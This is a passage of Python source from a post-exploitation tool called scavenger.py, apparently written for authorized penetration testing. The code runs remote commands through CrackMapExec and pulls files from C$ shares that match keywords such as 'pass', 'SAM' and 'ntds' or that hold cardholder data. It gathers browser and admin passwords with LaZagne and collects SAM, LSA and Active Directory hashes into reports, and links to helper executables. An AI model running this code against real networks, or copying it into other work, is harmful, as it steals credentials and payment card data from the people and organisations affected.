args.overwrite: 820 | print("\033[91m[+]\033[00m OVERWRITE ENABLED: Previous scavenger cached data will be overwriten...\n") 821 | 822 | detect_str = " ".join(detect) 823 | print(detect_str) 824 | 825 | for y in range(10): 826 | scav_thread = Thread(target=multithread_maker, args=(scav_queue,)) 827 | scav_thread.daemon = True 828 | scav_thread.start() 829 | 830 | for z in range(len(iplist_up)): 831 | scav_queue.put(iplist_up[z]) 832 | 833 | t = Thread(target=smb_server) 834 | t.daemon = True 835 | t.start() 836 | 837 | scav_queue.join() # wait until thread terminates 838 | 839 | t.join() 840 | 841 | killpg(PID, SIGTERM) 842 | 843 | html_list_info = [] 844 | html_list_time = [] 845 | html_list_int = [] 846 | html_list_compare1 = [] 847 | html_list_compare2 = [] 848 | html_list_hashes = [] 849 | 850 | html_list_credit = [] 851 | 852 | html_list_laz_browsers = [] 853 | html_list_laz_sysadmin = [] 854 | 855 | html_list_sam_hashes = [] 856 | html_list_lsa_hashes = [] 857 | html_list_ntds_hashes = [] 858 | 859 | db = connect("results/scavenger-cache.dscav") 860 | db.isolation_level = None 861 | db.text_factory = str 862 | con_db = db.cursor() 863 | 864 | with db: 865 | info_smb = con_db.execute(f"""SELECT * FROM 'info_smb_latest' ORDER by ip_address""") 866 | for r in info_smb: 867 | html_list_info.append(r) 868 | 869 | for i in iplist_up: 870 | with db: 871 | time_smb = con_db.execute(f"""SELECT * FROM 'time_smb_latest' WHERE ip_address='{i}' ORDER BY folder_date DESC LIMIT 20""") 872 | for r in time_smb: 873 | html_list_time.append(r) 874 | 875 | intphrase = ["pass", "secret", "card", "pan", "credit", "security", "ntuser.dat", "SAM", "hosts", "ntds", "pentest", "penetration", "red tean", "owasp"] 876 | 877 | for word in intphrase: 878 | with db: 879 | word = "'%" + word + "%'" 880 | int_smb = con_db.execute(f"""SELECT DISTINCT ip_address,folder_name FROM time_smb_latest WHERE folder_name LIKE {word}""") 881 | for r in int_smb: 882 | html_list_int.append(r) 883 | 884 | if len(html_list_int) > 0: 885 | 886 | html_list_int_u = list(set(html_list_int)) 887 | files_int_list_download = [] 888 | for ip_int_download, fold_download in html_list_int_u: 889 | parent3 = str(PureWindowsPath(fold_download).parent) 890 | file3 = str(PureWindowsPath(fold_download).name) 891 | size = crackmapexec_command_exec(ip_int_download, f"""-x 'forfiles.exe /P "{parent3}" /m "{file3}" /C "cmd /c echo @fsize"'""") 892 | if int(size[-1]) > 0 and int(size[-1 ]) < 314572800: 893 | if not path.exists(f"downloads/{ip_int_download}"): 894 | mkdir(f"downloads/{ip_int_download}") 895 | parent3 = parent3.replace('c:', '') 896 | command_execute(f"""smbclient //{ip_int_download}/c$ -c 'lcd downloads/{ip_int_download}; cd {parent3}; get \"{file3}\"' -U {username_g}%{password_g} -W {domain_g}""") 897 | files_int_list_download.append(f"\033[97m{ip_int_download} -\033[00m {fold_download} \033[97m=> local:\033[00m {script_path}/downloads/{ip_int_download}/{file3}") 898 | 899 | files_int_list_download_set = set(files_int_list_download) 900 | 901 | if compare: 902 | 903 | if not args.overwrite: 904 | detect.append("\n\033[94m[+]\033[00m Previous scavenger cached data will be preserved ...\n") 905 | 906 | detect.append("\n\033[94m[+]\033[00m Running scavenger cache data compare ...\n") 907 | 908 | compare1_check = False 909 | compare2_check = False 910 | 911 | with db: 912 | time_smb_compare1 = con_db.execute(f"""SELECT * FROM (SELECT * FROM time_smb_latest EXCEPT SELECT * FROM time_smb_previous) ORDER BY folder_date DESC LIMIT 20""") 913 | for r in time_smb_compare1: 914 | html_list_compare1.append(r) 915 | 916 | if len(html_list_compare1) > 0: 917 | compare1_check = True 918 | 919 | with db: 920 | time_smb_compare2 = con_db.execute(f"""SELECT * FROM (SELECT * FROM time_smb_previous EXCEPT SELECT * FROM time_smb_latest) ORDER BY folder_date DESC LIMIT 20""") 921 | for r in time_smb_compare2: 922 | html_list_compare2.append(r) 923 | 924 | if len(html_list_compare2) > 0: 925 | compare2_check = True 926 | 927 | with db: 928 | credit_smb = con_db.execute(f"""SELECT ip_address,folder_cc FROM credit_smb_latest ORDER BY ip_address""") 929 | for r in credit_smb: 930 | html_list_credit.append(r) 931 | 932 | if len(html_list_credit) > 0: 933 | 934 | cc_file_list = [] 935 | for ip_cc_download, fold_cc_download in html_list_credit: 936 | cc_match_download = search(r'^(.+)\s{1}[A-Z_]+\s{1}\d+\s?', fold_cc_download) 937 | if cc_match_download: 938 | cc_match_download2 = search(r'^(\w{1}:.+)(\/[\w\d\-\.\@]+.\w{3})', cc_match_download.group(1)) 939 | if cc_match_download2: 940 | parent = cc_match_download2.group(1) 941 | file = cc_match_download2.group(2) 942 | parent2 = str(PureWindowsPath(cc_match_download.group(1)).parent) 943 | file2 = str(PureWindowsPath(cc_match_download.group(1)).name) 944 | 945 | size_c = crackmapexec_command_exec(ip_cc_download, f"""-x 'forfiles.exe /P "{parent2}" /m "{file2}" /C "cmd /c echo @fsize"'""") 946 | if int(size_c[-1]) > 0 and int(size_c[-1 ]) < 314572800: 947 | if not path.exists(f"downloads/{ip_cc_download}/chdfiles"): 948 | mkdir(f"downloads/{ip_cc_download}/chdfiles") 949 | parent2 = parent2.replace('c:', '') 950 | command_execute(f"""smbclient //{ip_cc_download}/c$ -c 'lcd downloads/{ip_cc_download}/chdfiles; cd {parent2}; get \"{file2}\"' -U {username_g}%{password_g} -W {domain_g}""") 951 | cc_file_list.append(f"\033[97m{ip_cc_download} -\033[00m {cc_match_download.group(1)} \033[97m=> local:\033[00m {script_path}/downloads/{ip_cc_download}/chdfiles/{file2}") 952 | 953 | cc_file_list_set = set(cc_file_list) 954 | 955 | laz_browsers_check = False 956 | 957 | with db: 958 | laz_browser = con_db.execute(f"""SELECT ip_address,laz_browsers FROM laz_b_smb_latest ORDER BY ip_address""") 959 | for r in laz_browser: 960 | if '[+] 0 passwords have been found.' not in r: 961 | html_list_laz_browsers.append(r) 962 | laz_browsers_check = True 963 | 964 | laz_sysadmin_check = False 965 | 966 | with db: 967 | laz_sysadmin = con_db.execute(f"""SELECT ip_address,laz_sysadmin FROM laz_s_smb_latest ORDER BY ip_address""") 968 | for r in laz_sysadmin: 969 | if '[+] 0 passwords have been found.' not in r: 970 | html_list_laz_sysadmin.append(r) 971 | laz_sysadmin_check = True 972 | 973 | with db: 974 | sam_hashes_smb = con_db.execute(f"""SELECT ip_address,sam_hashes FROM 'hashes_sam_smb_latest'""") 975 | for r in sam_hashes_smb: 976 | html_list_sam_hashes.append(r) 977 | 978 | with db: 979 | lsa_hashes_smb = con_db.execute(f"""SELECT ip_address,lsa_hashes FROM 'hashes_lsa_smb_latest'""") 980 | for r in lsa_hashes_smb: 981 | html_list_lsa_hashes.append(r) 982 | 983 | with db: 984 | ntds_hashes_smb = con_db.execute(f"""SELECT ip_address,ntds_hashes FROM 'hashes_ntds_smb_latest'""") 985 | for r in ntds_hashes_smb: 986 | html_list_ntds_hashes.append(r) 987 | 988 | html_header = """ 989 | 990 | 991 | 992 | 993 | 994 | 995 | Scavenger Output 996 | 997 | 998 | 999 | 1000 | 1009 | 1014 | 1015 | 1016 |

scavenger.py v1.0 by Philip Pieterse (@haxrbyte) [https://github.com/SpiderLabs/scavenger] 1017 | *************************************************** 1018 | * ___ ___ __ ___ _____ _ __ __ _ ___ _ __ * 1019 | * / __|/ __/ _` \ \ / / _ \ '_ \ / _` |/ _ \ '__| * 1020 | * \__ \ (_| (_| |\ V / __/ | | | (_| | __/ | * 1021 | * |___/\___\__,_| \_/ \___|_| |_|\__, |\___|_| * 1022 | * |___/ * 1023 | *************************************************** 1024 | 1025 | scavenger => definition [noun]: a person who searches for and collects discarded items. 1026 | 1027 | *** Powered and Inspired by *** 1028 | Impacket https://github.com/CoreSecurity/impacket (@agsolino) 1029 | CrackMapExec https://github.com/byt3bl33d3r/CrackMapExec (@byt3bl33d3r) 1030 | ccsrch https://github.com/adamcaudill/ccsrch (@adamcaudill) 1031 | LaZagne https://github.com/AlessandroZ/LaZagne 1032 |

1033 |
1034 | """ 1035 | 1036 | closing_html = """ 1037 |
1038 | 1039 | 1040 | 1041 | """ 1042 | 1043 | closing_html_code = """ 1044 |

1045 | """ 1046 | 1047 | closing_html_code_div = """ 1048 |

1049 | 1050 | """ 1051 | 1052 | # now open the file for writing 1053 | with open("results/scavenger-smb.html", 'w') as html_file_builder: 1054 | # begin html file 1055 | html_file_builder.write(html_header) 1056 | for ip, dc_check, mh_check, sh_check, lh_check, nh_check, cc_check, t2_check, laz_b_check, laz_s_check, runas, host_name, os_name, win_dir, sys_dir, domain_name, nr_net in html_list_info: 1057 | with open(f"results/{ip}-scavenger-smb.scav", 'w') as text_file_builder: 1058 | text_file_builder.write("scavenger.py v1.0 by Philip Pieterse (@haxrbyte) [https://github.com/SpiderLabs/scavenger]") 1059 | banner_text = """ 1060 | *************************************************** 1061 | * ___ ___ __ ___ _____ _ __ __ _ ___ _ __ * 1062 | * / __|/ __/ _` \ \ / / _ \ '_ \ / _` |/ _ \ '__| * 1063 | * \__ \ (_| (_| |\ V / __/ | | | (_| | __/ | * 1064 | * |___/\___\__,_| \_/ \___|_| |_|\__, |\___|_| * 1065 | * |___/ * 1066 | *************************************************** 1067 | 1068 | """ 1069 | text_file_builder.write(banner_text) 1070 | text_file_builder.write("scavenger => definition [noun]: a person who searches for and collects discarded items.\n") 1071 | text_file_builder.write("*** Powered and Inspired by ***\n") 1072 | text_file_builder.write("Impacket https://github.com/CoreSecurity/impacket (@agsolino)\n") 1073 | text_file_builder.write("CrackMapExec https://github.com/byt3bl33d3r/CrackMapExec (@byt3bl33d3r)\n") 1074 | text_file_builder.write("ccsrch https://github.com/adamcaudill/ccsrch (@adamcaudill)\n") 1075 | text_file_builder.write("LaZagne https://github.com/AlessandroZ/LaZagne\n\n") 1076 | text_file_builder.write(f"=== START => {ip} ===\n") 1077 | 1078 | html_check = [] 1079 | 1080 | if dc_check: 1081 | html_check.append("Domain Controller") 1082 | if mh_check: 1083 | html_check.append("Multi Homed") 1084 | 1085 | html_check_compare1 = False 1086 | html_check_compare2 = False 1087 | html_check_int = False 1088 | html_check_lazb = False 1089 | html_check_lazs = False 1090 | 1091 | if html_check_compare1 or html_check_compare2: 1092 | html_check.append("Unique to Cache") 1093 | 1094 | if len(html_list_int) > 0: 1095 | html_check.append("Interesting Files") 1096 | html_check_int = True 1097 | 1098 | if cc_check: 1099 | html_check.append("Card Holder Data") 1100 | if t2_check: 1101 | html_check.append("Track2") 1102 | if laz_browsers_check: 1103 | for ip_l, laz_credsb in html_list_laz_browsers: 1104 | if ip_l == ip: 1105 | html_check_lazb = True 1106 | 1107 | if laz_sysadmin_check: 1108 | for ip_l, laz_credss in html_list_laz_sysadmin: 1109 | if ip_l == ip: 1110 | html_check_lazs = True 1111 | 1112 | if html_check_lazb or html_check_lazs: 1113 | html_check.append("Other Credentials") 1114 | 1115 | if sh_check: 1116 | html_check.append("SAM Hashes") 1117 | if lh_check: 1118 | html_check.append("LSA Secrets") 1119 | if nh_check: 1120 | html_check.append("AD Hashes") 1121 | 1122 | html_check_str = " * ".join(html_check) 1123 | 1124 | html_section_info = f""" 1125 |

{ip} ({host_name}) => {html_check_str} 1126 |

1127 |
1128 |

Running as user : {runas}

1129 |

OS Name : {os_name}

1130 |

Win Directory : {win_dir}

1131 |

System Directory : {sys_dir}

1132 |

Domain Name : {domain_name}

1133 |

Amount of Network Cards : {nr_net}

1134 |

List of LATEST modified files and folders (newest first) :

1135 |

""" 1136 | 1137 | text_section_info = f""" 1138 | [+] {ip} ({host_name}) => {html_check_str} 1139 | 1140 | Running as user : {runas} 1141 | OS Name : {os_name} 1142 | Win Directory : {win_dir} 1143 | System Directory : {sys_dir} 1144 | Domain Name : {domain_name} 1145 | Amount of Network Cards : {nr_net} 1146 | 1147 | [+] List of LATEST modified files and folders (newest first) : 1148 | """ 1149 | html_file_builder.write(html_section_info) 1150 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1151 | text_file_builder.write(text_section_info) 1152 | 1153 | for ip_t, files_t, date_t in html_list_time: 1154 | if ip_t == ip: 1155 | html_section_time1 = f""" 1156 | {files_t} {date_t}""" 1157 | text_section_time1 = f""" 1158 | {files_t} {date_t}""" 1159 | html_file_builder.write(html_section_time1) 1160 | 1161 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1162 | text_file_builder.write(text_section_time1) 1163 | 1164 | html_section_time2 = f""" 1165 |

""" 1166 | html_file_builder.write(html_section_time2) 1167 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1168 | text_file_builder.write("\n") 1169 | 1170 | # Files compare 1 1171 | if html_check_compare1: 1172 | html_section_compare1_1 = f""" 1173 |

List of file and folder names unique to the LATEST cached list compared to the PREVIOUS cached list (newest first) :

1174 |

""" 1175 | text_section_compare1_1 = f""" 1176 | [+] List of file and folder names unique to the LATEST cached list compared to the PREVIOUS cached list (newest first) : 1177 | 1178 | """ 1179 | 1180 | html_file_builder.write(html_section_compare1_1) 1181 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1182 | text_file_builder.write(text_section_compare1_1) 1183 | 1184 | for ip_c1, files_c1, date_c1 in html_list_compare1: 1185 | if ip_c1 == ip: 1186 | html_section_compare1_2 = f""" 1187 | {files_c1} {date_c1}""" 1188 | text_section_compare1_2 = f""" 1189 | {files_c1} {date_c1} 1190 | """ 1191 | 1192 | html_file_builder.write(html_section_compare1_2) 1193 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1194 | text_file_builder.write(f" {files_c1} {date_c1}\n") 1195 | 1196 | if html_check_compare2: 1197 | html_file_builder.write(closing_html_code) 1198 | elif html_check_int: 1199 | html_file_builder.write(closing_html_code) 1200 | elif cc_check: 1201 | html_file_builder.write(closing_html_code) 1202 | elif html_check_lazb: 1203 | html_file_builder.write(closing_html_code) 1204 | elif html_check_lazs: 1205 | html_file_builder.write(closing_html_code) 1206 | elif sh_check: 1207 | html_file_builder.write(closing_html_code) 1208 | elif lh_check: 1209 | html_file_builder.write(closing_html_code) 1210 | elif nh_check: 1211 | html_file_builder.write(closing_html_code) 1212 | else: 1213 | html_file_builder.write(closing_html_code_div) 1214 | 1215 | # Files compare 2 1216 | if html_check_compare2: 1217 | html_section_compare2_1 = f""" 1218 |

List of file and folder names unique to the PREVIOUS cached list compared to the LATEST cached list (newest first) :

1219 |

""" 1220 | text_section_compare2_1 = f""" 1221 | [+] List of file and folder names unique to the PREVIOUS cached list compared to the LATEST cached list (newest first) : 1222 | 1223 | """ 1224 | html_file_builder.write(html_section_compare2_1) 1225 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1226 | text_file_builder.write(text_section_compare2_1) 1227 | 1228 | for ip_c2, files_c2, date_c2 in html_list_compare2: 1229 | if ip_c2 == ip: 1230 | html_section_compare2_2 = f""" 1231 | {files_c2} {date_c2}""" 1232 | text_section_compare2_2 = f""" 1233 | {files_c2} {date_c2} 1234 | """ 1235 | html_file_builder.write(html_section_compare2_2) 1236 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1237 | text_file_builder.write(f" {files_c2} {date_c2}\n") 1238 | 1239 | if html_check_int: 1240 | html_file_builder.write(closing_html_code) 1241 | elif cc_check: 1242 | html_file_builder.write(closing_html_code) 1243 | elif html_check_lazb: 1244 | html_file_builder.write(closing_html_code) 1245 | elif html_check_lazs: 1246 | html_file_builder.write(closing_html_code) 1247 | elif sh_check: 1248 | html_file_builder.write(closing_html_code) 1249 | elif lh_check: 1250 | html_file_builder.write(closing_html_code) 1251 | elif nh_check: 1252 | html_file_builder.write(closing_html_code) 1253 | else: 1254 | html_file_builder.write(closing_html_code_div) 1255 | 1256 | # Files int 1257 | if html_check_int: 1258 | html_section_int1 = f""" 1259 |

List of file and folder names that match INTERESTING phrases :

1260 |

""" 1261 | text_section_int1 = f""" 1262 | [+] List of file and folder names that match INTERESTING phrases : 1263 | """ 1264 | html_file_builder.write(html_section_int1) 1265 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1266 | text_file_builder.write(text_section_int1) 1267 | files_int_list = [] 1268 | for ip_i, files_i in html_list_int: 1269 | if ip_i == ip: 1270 | files_int_list.append(files_i) 1271 | 1272 | files_int_list_u = list(set(files_int_list)) 1273 | files_int_list_u.sort() 1274 | for f in files_int_list_u: 1275 | html_section_int2 = f""" 1276 | {f}""" 1277 | text_section_int2 = f""" 1278 | {f} 1279 | """ 1280 | html_file_builder.write(html_section_int2) 1281 | #print_debug("text_section_int2", str(text_section_int2.split())) 1282 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1283 | text_file_builder.write(f" {f}\n") 1284 | 1285 | if cc_check: 1286 | html_file_builder.write(closing_html_code) 1287 | elif html_check_lazb: 1288 | html_file_builder.write(closing_html_code) 1289 | elif html_check_lazs: 1290 | html_file_builder.write(closing_html_code) 1291 | elif sh_check: 1292 | html_file_builder.write(closing_html_code) 1293 | elif lh_check: 1294 | html_file_builder.write(closing_html_code) 1295 | elif nh_check: 1296 | html_file_builder.write(closing_html_code) 1297 | else: 1298 | html_file_builder.write(closing_html_code_div) 1299 | 1300 | # Credit Card 1301 | if cc_check: 1302 | html_section_credit1 = f""" 1303 |

List of file names and Card Holder Data :

1304 |

""" 1305 | text_section_credit1 = f""" 1306 | [+] List of file names which contain Card Holder Data : 1307 | 1308 | """ 1309 | html_file_builder.write(html_section_credit1) 1310 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1311 | text_file_builder.write(text_section_credit1) 1312 | 1313 | files_cc_list = [] 1314 | for ip_credit, files_credit in html_list_credit: 1315 | if ip_credit == ip: 1316 | files_cc_list.append(f"{files_credit}") 1317 | files_cc_list_u = list(set(files_cc_list)) 1318 | files_cc_list_u.sort() 1319 | for f in files_cc_list_u: 1320 | 1321 | 1322 | html_section_credit2 = f""" 1323 | {f}""" 1324 | text_section_credit2 = f""" 1325 | {f} 1326 | """ 1327 | html_file_builder.write(html_section_credit2) 1328 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1329 | text_file_builder.write(f" {files_credit}\n") 1330 | 1331 | if html_check_lazb: 1332 | html_file_builder.write(closing_html_code) 1333 | elif html_check_lazs: 1334 | html_file_builder.write(closing_html_code) 1335 | elif sh_check: 1336 | html_file_builder.write(closing_html_code) 1337 | elif lh_check: 1338 | html_file_builder.write(closing_html_code) 1339 | elif nh_check: 1340 | html_file_builder.write(closing_html_code) 1341 | else: 1342 | html_file_builder.write(closing_html_code_div) 1343 | 1344 | # Laz B 1345 | if html_check_lazb: 1346 | html_section_lazb1 = f""" 1347 |

Saved Credentials in browsers obtained :

1348 |

""" 1349 | text_section_lazb1 = f""" 1350 | [+] Saved Credentials in browsers obtained : 1351 | """ 1352 | html_file_builder.write(html_section_lazb1) 1353 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1354 | text_file_builder.write(text_section_lazb1) 1355 | for ip_lazb, lazb_found in html_list_laz_browsers: 1356 | if ip_lazb == ip: 1357 | # print_debug('lazb_found', lazb_found) 1358 | html_section_lazb2 = f""" 1359 | {lazb_found}""" 1360 | text_section_lazb2 = f""" 1361 | {lazb_found} 1362 | """ 1363 | html_file_builder.write(html_section_lazb2) 1364 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1365 | text_file_builder.write(f" {lazb_found}\n") 1366 | 1367 | if html_check_lazs: 1368 | html_file_builder.write(closing_html_code) 1369 | elif sh_check: 1370 | html_file_builder.write(closing_html_code) 1371 | elif lh_check: 1372 | html_file_builder.write(closing_html_code) 1373 | elif nh_check: 1374 | html_file_builder.write(closing_html_code) 1375 | else: 1376 | html_file_builder.write(closing_html_code_div) 1377 | 1378 | # Laz S 1379 | if html_check_lazs: 1380 | html_section_lazs1 = f""" 1381 |

Saved Credentials in systems admin type apps obtained :

1382 |

""" 1383 | text_section_lazs1 = f""" 1384 | [+] Saved Credentials in systems admin type apps obtained : 1385 | """ 1386 | html_file_builder.write(html_section_lazs1) 1387 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1388 | text_file_builder.write(text_section_lazs1) 1389 | for ip_lazs, lazs_found in html_list_laz_sysadmin: 1390 | if ip_lazs == ip: 1391 | html_section_lazs2 = f""" 1392 | {lazs_found}""" 1393 | text_section_lazs2 = f""" 1394 | {lazs_found} 1395 | """ 1396 | html_file_builder.write(html_section_lazs2) 1397 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1398 | text_file_builder.write(f" {lazs_found}\n") 1399 | 1400 | if html_check_lazs: 1401 | html_file_builder.write(closing_html_code) 1402 | elif lh_check: 1403 | html_file_builder.write(closing_html_code) 1404 | elif nh_check: 1405 | html_file_builder.write(closing_html_code) 1406 | else: 1407 | html_file_builder.write(closing_html_code_div) 1408 | 1409 | # SAM Hashes 1410 | if sh_check: 1411 | html_section_hash1_1 = f""" 1412 |

Local SAM Hashes :

1413 |

""" 1414 | text_section_hash1_1 = f""" 1415 | [+] Local SAM Hashes : 1416 | 1417 | """ 1418 | html_file_builder.write(html_section_hash1_1) 1419 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1420 | text_file_builder.write(text_section_hash1_1) 1421 | for ip_hashs, hashs in html_list_sam_hashes: 1422 | if ip_hashs == ip: 1423 | html_section_hash1_2 = f""" 1424 | {hashs}""" 1425 | text_section_hash1_2 = f""" 1426 | {hashs} 1427 | """ 1428 | html_file_builder.write(html_section_hash1_2) 1429 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1430 | text_file_builder.write(f" {hashs}\n") 1431 | 1432 | if lh_check: 1433 | html_file_builder.write(closing_html_code) 1434 | elif nh_check: 1435 | html_file_builder.write(closing_html_code) 1436 | else: 1437 | html_file_builder.write(closing_html_code_div) 1438 | 1439 | # LSA Secrets 1440 | if lh_check: 1441 | html_section_hash2_1 = f""" 1442 |

LSA Secrets :

1443 |

""" 1444 | text_section_hash2_1 = f""" 1445 | [+] LSA Secrets : 1446 | 1447 | """ 1448 | html_file_builder.write(html_section_hash2_1) 1449 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1450 | text_file_builder.write(text_section_hash2_1) 1451 | for ip_hashl, hashl in html_list_lsa_hashes: 1452 | if ip_hashl == ip: 1453 | html_section_hash2_2 = f""" 1454 | {hashl}""" 1455 | text_section_hash2_2 = f""" 1456 | {hashl} 1457 | """ 1458 | html_file_builder.write(html_section_hash2_2) 1459 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1460 | text_file_builder.write(f" {hashl}\n") 1461 | html_section_hash2_3 = f""" 1462 |

""" 1463 | if nh_check: 1464 | html_file_builder.write(closing_html_code) 1465 | else: 1466 | html_file_builder.write(closing_html_code_div) 1467 | 1468 | 1469 | # AD Hashes 1470 | if nh_check: 1471 | html_section_hash3_1 = f""" 1472 |

Active Directory Hashes :

1473 |

""" 1474 | text_section_hash3_1 = f""" 1475 | [+] Active Directory Hashes : 1476 | 1477 | """ 1478 | html_file_builder.write(html_section_hash3_1) 1479 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1480 | text_file_builder.write(text_section_hash3_1) 1481 | for ip_hashn, hashn in html_list_ntds_hashes: 1482 | if ip_hashn == ip: 1483 | html_section_hash3_2 = f""" 1484 | {hashn}""" 1485 | text_section_hash3_2 = f""" 1486 | {hashn} 1487 | """ 1488 | html_file_builder.write(html_section_hash3_2) 1489 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as text_file_builder: 1490 | text_file_builder.write(f" {hashn}\n") 1491 | html_file_builder.write(closing_html_code_div) 1492 | with open(f"results/{ip}-scavenger-smb.scav", 'a') as textfile_builder: 1493 | textfile_builder.write(f"\n=== END => {ip} ===\n") 1494 | 1495 | # end html file 1496 | html_file_builder.write(closing_html) 1497 | 1498 | printing('10.0.0.100', f"\n*** SCAVENGING ENDED ***\n", color='gray') 1499 | 1500 | return 1501 | 1502 | if __name__ == '__main__': 1503 | signal(SIGINT, signal_handler) 1504 | main() 1505 | -------------------------------------------------------------------------------- /server/ccsrch.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/scavenger/df517798776e10fcf5c70ff78828a6692ae4529b/server/ccsrch.exe -------------------------------------------------------------------------------- /server/laZagne_scav.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/scavenger/df517798776e10fcf5c70ff78828a6692ae4529b/server/laZagne_scav.exe --------------------------------------------------------------------------------